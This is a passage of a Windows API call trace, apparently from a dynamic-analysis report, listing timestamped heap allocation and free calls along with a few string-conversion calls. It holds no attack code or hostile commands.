Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.270] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.270] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0158.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.271] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0158.271] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.272] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.272] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.273] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.273] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8df028 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8df000 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0158.274] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8df050 [0158.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0158.274] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.275] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.275] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.276] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0158.276] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0158.276] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8df028 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0158.277] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8def10 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8df000 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0158.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8df050 [0158.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8df050, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df050 | out: hHeap=0x8a0000) returned 1 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8df000 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0158.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0158.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0158.281] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd780 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0158.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0158.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0158.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0158.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0158.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.282] RtlAllocateHeap (HeapHandle=0x8a0000, 